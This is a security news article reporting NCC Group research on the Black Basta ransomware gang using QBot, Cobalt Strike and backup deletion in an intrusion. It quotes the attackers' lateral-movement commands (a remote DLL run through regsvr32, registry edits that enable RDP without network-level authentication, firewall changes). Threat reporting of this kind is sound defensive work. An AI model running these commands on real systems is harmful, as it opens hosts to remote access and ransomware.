Researchers from NCC Group spotted a new partnership in the threat landscape between the Black Basta ransomware group and the QBot malware operation.
Black Basta has been active since April 2022, like other ransomware operations, it implements a double-extortion attack model.
QBot, aka Qakbot and Pinkslipbot, has been active since 2008, it is used by threat actors for collecting browsing data and banking credentials and other financial information from the victims.
Its modular structure allows operators to implement new features to extend their capabilities.
The Qbot malware operation had numerous collaborations in the past with other ransomware gangs, including ProLock, Egregor, DoppelPaymer, and MegaCortex.
NCC Group researchers discovered the new partnership while investigating a recent incident, unlike past collaborations Black Basta gang is using QBot to spread laterally throughout the target network.
“Black Basta was observed using the following methods to laterally move throughout the network after their initial access had been gained:” reads analysis published by NCC:
regsvr32.exe -s \\<IP address of compromised Domain Controller>\SYSVOL\<random string>.dll
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
net start MpsSvc
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f"
Experts reported that the threat actor used two main techniques to evade anti-virus detection by disabling Windows Defender.
The first technique leverages the batch script d.bat which was deployed locally on compromised hosts and executed a series of PowerShell commands. The second technique involved creating a GPO (Group Policy Object) on a compromised Domain Controller, which would push out a series of changes to the Windows Registry of domain-joined hosts.
The threat actors used Qakbot to maintain persistence on the victim’s network, experts also observed the use of Cobalt Strike beacons during the compromise.
The attackers, prior to the deployment of the ransomware, established RDP sessions to Hyper-V servers to modify configurations for the Veeam backup jobs and deleted the backups of the virtual machines used by the victims.
Then the attackers run a script to deliver the ransomware binary to the IP addresses contained within the file C:\Windows\pc_list.txt.
The researchers shared technical details about the ransomware along with the Indicators of Compromise (IoCs).
Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.
Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)
To nominate, please visit:
Follow me on Twitter: @securityaffairs and Facebook
|[adrotate banner=”9″]||[adrotate banner=”12″]|
(SecurityAffairs – hacking, Black Basta ransomware)